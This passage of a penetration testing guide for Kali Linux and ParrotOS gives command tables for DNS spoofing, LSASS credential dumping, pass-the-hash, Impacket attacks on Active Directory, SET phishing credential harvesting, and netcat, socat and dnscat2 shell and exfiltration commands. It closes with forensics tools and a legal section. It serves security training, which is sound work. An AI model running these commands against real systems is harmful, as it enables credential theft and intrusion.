| 7 | DNS Spoofing | set dns.spoof.domains evil.com set dns.spoof.address 192.168.1.10 dns.spoof on | Redirects DNS lookups for evil.com to attacker’s IP |
| 8 | HTTPS Downgrade (SSLstrip) | set https.proxy.sslstrip true https.proxy on | Downgrades HTTPS to HTTP where HSTS is not enforced |
| 9 | Launch Web UI | sudo bettercap -caplet http-ui — Browser: http://127.0.0.1 — | Interactive web-based control panel for bettercap |
Post-Exploitation Tools
Mimikatz / Pypykatz — Credential Extraction
Tool
Mimikatz / Pypykatz
Platform
Kali Linux (Pypykatz)
Category
Post-Exploitation / Creds
Difficulty
Advanced
Mimikatz is a Windows-based post-exploitation tool that extracts plaintext passwords, NTLM hashes, Kerberos tickets, and other credentials from Windows memory (LSASS process). Pypykatz is a Python reimplementation that can be run directly from Kali/ParrotOS to parse LSASS dump files offline.
Step-by-Step Procedures — Pypykatz (from Kali/Parrot)
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Install Pypykatz | pip3 install pypykatz | Pure Python; no Windows required |
| 2 | Dump LSASS via Meterpreter | # In Meterpreter session: pidof lsass shell tasklist /FI “IMAGENAME eq lsass.exe” — Note the PID (e.g., 596) — | Must have SYSTEM-level privileges in Meterpreter session |
| 3 | Create LSASS Minidump | # In Meterpreter: procmem dump -p 596 -o lsass.dmp | Dumps LSASS process memory to file |
| 4 | Download Dump File | # In Meterpreter: download lsass.dmp /tmp/lsass.dmp | Transfers dump file to Kali/Parrot machine |
| 5 | Parse with Pypykatz | pypykatz lsa minidump /tmp/lsass.dmp | Extracts credentials from offline LSASS dump |
| 6 | Extract NTLM Hashes Only | pypykatz lsa minidump lsass.dmp -o output.json cat output.json | grep -A2 ‘NT:’ | Filter for NT (NTLM) hashes for pass-the-hash attacks |
| 7 | Pass-the-Hash with CrackMapExec | crackmapexec smb 192.168.1.0/24 -u Administrator -H <NTLM_HASH> | Use extracted NTLM hash to authenticate without cracking |
Impacket — Windows Protocol Attack Suite
Tool
Impacket
Platform
Kali Linux / ParrotOS
Category
Post-Exploitation / AD
Difficulty
Advanced
Impacket is a collection of Python classes and tools for working with Windows network protocols (SMB, MSRPC, NTLM, Kerberos, LDAP). It is essential for Active Directory penetration testing, providing tools for remote code execution, Kerberoasting, AS-REP roasting, and DCSync attacks.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Install Impacket | sudo apt install python3-impacket impacket-scripts -y | Installs all Impacket scripts to /usr/share/doc/python3-impacket/examples/ |
| 2 | Remote Code Execution (psexec) | impacket-psexec domain/Administrator:Password@192.168.1.100 | Spawns SYSTEM shell on Windows target via SMB |
| 3 | SMB Exec (Noisy Alternative) | impacket-smbexec domain/user:pass@192.168.1.100 | Similar to psexec but uses SMB share execution |
| 4 | WMI Execution | impacket-wmiexec domain/user:pass@192.168.1.100 ‘whoami’ | Executes command via WMI; leaves fewer traces than psexec |
| 5 | Kerberoasting | impacket-GetUserSPNs domain.local/user:pass -dc-ip 192.168.1.10 -request | Requests service tickets for accounts with SPNs; crack offline with Hashcat |
| 6 | AS-REP Roasting | impacket-GetNPUsers domain.local/ -usersfile users.txt -dc-ip 192.168.1.10 -no-pass | Requests AS-REP hashes for accounts without pre-auth required |
| 7 | DCSync Attack | impacket-secretsdump domain/DCAdmin:pass@DC_IP | Replicates DC hashes without running code on the DC; requires Domain Admin |
| 8 | NTLM Relay Attack | impacket-ntlmrelayx -tf targets.txt -smb2support | Relays NTLM authentication to other hosts; pair with Responder |
11. ParrotOS-Exclusive & Anonymity Tools
While ParrotOS shares the majority of its security toolset with Kali Linux, it ships with several unique tools, particularly focused on anonymity, operational security (OPSEC), and privacy — critical considerations for covert engagements.
11.1 AnonSurf — System-Wide Traffic Anonymization
Tool
AnonSurf
Platform
ParrotOS (Exclusive)
Category
Anonymity / OPSEC
Difficulty
Beginner
AnonSurf is a ParrotOS tool that routes all system network traffic through the Tor anonymization network, changes the system’s MAC address, and kills potentially identifying processes. It is not available in Kali Linux by default.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Start AnonSurf | sudo anonsurf start | Routes all traffic through Tor; changes MAC address |
| 2 | Check Current Status | sudo anonsurf status | Confirms Tor is running and traffic is anonymized |
| 3 | Check Current IP Address | curl https://api.ipify.org — Should return a Tor exit node IP — | Verify anonymization is working correctly |
| 4 | Change Tor Circuit | sudo anonsurf changeid | Requests a new Tor exit node (new apparent IP address) |
| 5 | View Tor DNS Configuration | sudo anonsurf myip | Shows current Tor exit node information |
| 6 | Stop AnonSurf | sudo anonsurf stop | Restores normal network routing; real IP visible again |
11.2 Additional ParrotOS-Highlighted Tools
| Tool | Category | Purpose & Basic Command |
|---|---|---|
| EvilGinx2 | Phishing / MITM | Advanced phishing framework that proxies authentication pages to capture credentials and session cookies, bypassing 2FA.evilginx2 |
| DNScat2 | C2 / Exfiltration | Command-and-control tool using DNS for covert communication and data exfiltration through firewalls.dnscat2 --dns host=<attacker-IP> |
| Netcat (nc) | Network Utility | TCP/UDP networking Swiss Army knife: port scanning, bind/reverse shells, file transfer.nc -lvnp 4444 (listener) | nc 192.168.1.10 4444 (connect) |
| Socat | Network Relay | Advanced netcat alternative with SSL support, file transfers, and port forwarding.socat TCP-LISTEN:4444,reuseaddr EXEC:/bin/bash |
| Empire (PS-Empire) | Post-Exploitation C2 | PowerShell/Python C2 framework for managing post-exploitation agents with modules for lateral movement.sudo powershell-empire |
| Fierce | DNS Recon | DNS reconnaissance tool for enumerating subdomains and adjacent IP space.fierce --domain example.com |
| Masscan | Fast Port Scanner | Fastest Internet-scale port scanner (100M packets/sec).sudo masscan 192.168.1.0/24 -p 22,80,443 --rate 1000 |
| Enum4linux-ng | SMB Enumeration | Enumerates Windows/Samba shares, users, password policies via SMB/RPC.enum4linux-ng -A 192.168.1.100 |
Digital Forensics Tools
Both Kali Linux and ParrotOS include forensic investigation capabilities. ParrotOS’s ‘Forensics Edition’ specifically targets incident responders and digital forensic investigators.
Autopsy — Digital Forensics Platform
Tool
Autopsy
Platform
Kali Linux / ParrotOS
Category
Digital Forensics
Difficulty
Intermediate
Autopsy is a digital forensics GUI built on top of The Sleuth Kit (TSK). It analyzes disk images and file systems for deleted files, browsing history, email artifacts, keyword searches, hash verification, and timeline analysis. Widely used in law enforcement and incident response.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Install Autopsy | sudo apt install autopsy -y | Web-based Autopsy 2.x comes with Kali; Autopsy 4.x must be downloaded separately |
| 2 | Acquire Disk Image | sudo dd if=/dev/sdb of=/evidence/disk.img bs=4M status=progress — OR — sudo dcfldd if=/dev/sdb of=/evidence/disk.img hash=md5 hashlog=hash.txt | Always verify hash integrity of acquired image |
| 3 | Start Autopsy | autopsy Browser: http://localhost:9999/autopsy | Opens Autopsy web interface in browser |
| 4 | Create New Case | New Case > Case Name: Incident_2025 Investigator: Your Name Time Zone: UTC | All evidence and notes stored per-case |
| 5 | Add Disk Image | Add Image > Disk Image > /evidence/disk.img Select file system type and mount point | Autopsy auto-detects partitions and file systems |
| 6 | Keyword Search | Keyword Search tab > Enter search terms (e.g., ‘password’, ‘confidential’, SSN patterns) | Searches allocated and unallocated space |
| 7 | File Analysis | File Analysis > Browse directory tree Right-click file > ‘Add to Image Details’ | Identify deleted files (shown in red in directory listing) |
| 8 | Timeline Analysis | Image Details > File Activity Timelines Set date range > Generate | Shows file access/modification/creation timeline |
| 9 | Generate Report | Generate Report > HTML Format > Generate | Exports full case report for evidentiary documentation |
Volatility — Memory Forensics Framework
Tool
Volatility 3
Platform
Kali Linux / ParrotOS
Category
Memory Forensics
Difficulty
Advanced
Volatility is the leading open-source memory forensics framework. It analyzes raw memory dumps (RAM captures) from Windows, Linux, and macOS systems to extract running processes, network connections, injected code, encryption keys, user activity, and malware artifacts.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Install Volatility 3 | git clone https://github.com/volatilityfoundation/volatility3.git cd volatility3 && pip3 install -r requirements.txt | Volatility 3 uses Python 3; no need to specify profiles |
| 2 | Identify OS Profile | python3 vol.py -f memory.dmp banners.Banners | Detects OS version and architecture from memory image |
| 3 | List Running Processes | python3 vol.py -f memory.dmp windows.pslist | Lists all active processes at time of capture |
| 4 | Detect Hidden Processes | python3 vol.py -f memory.dmp windows.psscan | Scans physical memory for EPROCESS structures; finds hidden/injected processes |
| 5 | List Network Connections | python3 vol.py -f memory.dmp windows.netstat | Shows TCP/UDP connections and listening ports |
| 6 | Dump Process Executable | python3 vol.py -f memory.dmp windows.dumpfiles –pid 1234 | Extracts PE from memory for malware analysis |
| 7 | Scan for Injected Code | python3 vol.py -f memory.dmp windows.malfind | Finds process memory regions with execute permissions and no backing file (classic injection indicator) |
| 8 | Extract Registry Hives | python3 vol.py -f memory.dmp windows.registry.hivelist | Lists all registry hives loaded in memory |
| 9 | Linux Memory Analysis | python3 vol.py -f linux_mem.dmp linux.pslist python3 vol.py -f linux_mem.dmp linux.bash | linux.bash recovers command history from memory |
Social Engineering Tools
Social-Engineer Toolkit (SET)
Tool
SET (setoolkit)
Platform
Kali Linux / ParrotOS
Category
Social Engineering
Difficulty
Intermediate
The Social-Engineer Toolkit (SET) is an open-source framework designed to simulate social engineering attacks. It automates phishing credential harvesting, website cloning, USB drop attacks, spear-phishing email campaigns, and more. SET is written in Python and is driven through an interactive menu system.
Step-by-Step Procedures — Credential Harvester
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Launch SET | sudo setoolkit | Opens the SET interactive menu; requires root |
| 2 | Select Social-Engineering Attacks | Menu > 1) Social-Engineering Attacks | Main category for all phishing/SE attacks |
| 3 | Select Website Attack Vector | Menu > 2) Website Attack Vectors | Browser-based attack delivery methods |
| 4 | Select Credential Harvester | Menu > 3) Credential Harvester Attack Method | Captures usernames and passwords from cloned sites |
| 5 | Site Cloner | Menu > 2) Site Cloner Enter your IP address: 192.168.1.10 URL to clone: https://accounts.google.com | SET clones the target site and hosts it locally |
| 6 | Wait for Victim Interaction | — SET listens on port 80 — — Credentials posted by victim appear in console — | Send victim a link to your IP via phishing email |
| 7 | View Captured Credentials | cat /root/.set/harvester/harvester_*.txt | All captured form fields saved to this directory |
Ethical Note
Social engineering attacks must only be performed as part of a contracted penetration test with explicit scope covering human-based testing. Unauthorized phishing attacks violate CAN-SPAM, CFAA, and may constitute wire fraud.
Penetration Testing Quick Reference
The following table provides an at-a-glance reference of all tools covered in this document.
| Tool | Category | Platform | Primary Command / Entry Point |
|---|---|---|---|
| Nmap | Recon | Kali / Parrot | nmap -A -T4 <target> |
| theHarvester | OSINT | Kali / Parrot | theHarvester -d <domain> -b all |
| Recon-ng | OSINT Framework | Kali / Parrot | recon-ng |
| Maltego | Graph OSINT | Kali / Parrot | maltego |
| Nikto | Web Scanning | Kali / Parrot | nikto -h <url> |
| OpenVAS/GVM | Vulnerability Mgmt | Kali / Parrot | sudo gvm-start |
| Lynis | Host Audit | Kali / Parrot | sudo lynis audit system |
| Metasploit | Exploitation | Kali / Parrot | msfconsole |
| SQLMap | SQL Injection | Kali / Parrot | sqlmap -u <url> |
| Hashcat | Hash Cracking | Kali / Parrot | hashcat -m <type> -a 0 <hash> <wordlist> |
| Hydra | Online Brute-Force | Kali / Parrot | hydra -l <user> -P <wordlist> <protocol>://<target> |
| John the Ripper | Hash Cracking | Kali / Parrot | john <hashes.txt> –wordlist=rockyou.txt |
| Burp Suite | Web App Proxy | Kali / Parrot | burpsuite |
| OWASP ZAP | Web App Scanner | Kali / Parrot | zaproxy |
| Gobuster | Web Enumeration | Kali / Parrot | gobuster dir -u <url> -w <wordlist> |
| Aircrack-ng | Wi-Fi Auditing | Kali / Parrot | aircrack-ng -w <wordlist> <capture.cap> |
| Wireshark | Packet Analysis | Kali / Parrot | wireshark / tshark -i eth0 |
| Bettercap | MITM Framework | Kali / Parrot | sudo bettercap -iface eth0 |
| Pypykatz | Credential Extraction | Kali / Parrot | pypykatz lsa minidump lsass.dmp |
| Impacket | Windows / AD Attack | Kali / Parrot | impacket-psexec domain/user:pass@<target> |
| AnonSurf | Anonymity | ParrotOS ONLY | sudo anonsurf start |
| Masscan | Fast Port Scan | Kali / Parrot | sudo masscan <range> -p <ports> –rate 1000 |
| Autopsy | Disk Forensics | Kali / Parrot | autopsy → http://localhost:9999/autopsy |
| Volatility 3 | Memory Forensics | Kali / Parrot | python3 vol.py -f <memory.dmp> windows.pslist |
| SET | Social Engineering | Kali / Parrot | sudo setoolkit |
Legal and Ethical Considerations
Important — Read Before Using Any Tool
Using these tools against systems, networks, or applications without explicit written authorization from the system owner is a serious criminal offense. This document is intended for use by certified security professionals, students in controlled lab environments, and system owners testing their own infrastructure.
Legal Frameworks
The following laws govern unauthorized computer access in major jurisdictions:
- United States: Computer Fraud and Abuse Act (18 U.S.C. § 1030) — up to 10 years imprisonment for unauthorized access
- United Kingdom: Computer Misuse Act 1990 (as amended) — up to 10 years imprisonment
- European Union: Directive 2013/40/EU on Attacks Against Information Systems
- Australia: Criminal Code Act 1995, Part 10.7 — Computer Offences
Rules of Engagement for Authorized Penetration Tests
- Obtain a signed Statement of Work (SOW) and Rules of Engagement (RoE) document before beginning
- Define the scope precisely — IP ranges, domains, applications, and testing windows
- Establish escalation procedures for critical findings discovered during the test
- Never access systems or data outside the agreed scope
- Maintain detailed logs of all actions taken during the test for accountability
- Restore all modified systems to their original state after testing
- Report all findings, including critical vulnerabilities, immediately to the client
Recommended Certifications for Penetration Testers
| Certification | Issuing Body | Focus |
|---|---|---|
| OSCP (PEN-200) | Offensive Security | Hands-on practical penetration testing; Kali Linux focused |
| CEH | EC-Council | Certified Ethical Hacker — broad security concepts |
| PNPT | TCM Security | Practical Network Penetration Tester — real-world skills |
| eJPT | INE / eLearnSecurity | Junior Penetration Tester — ideal entry-level certification |
| GPEN | GIAC / SANS | GIAC Penetration Tester — enterprise-focused methodology |
| CPENT | EC-Council | Certified Penetration Testing Professional — advanced |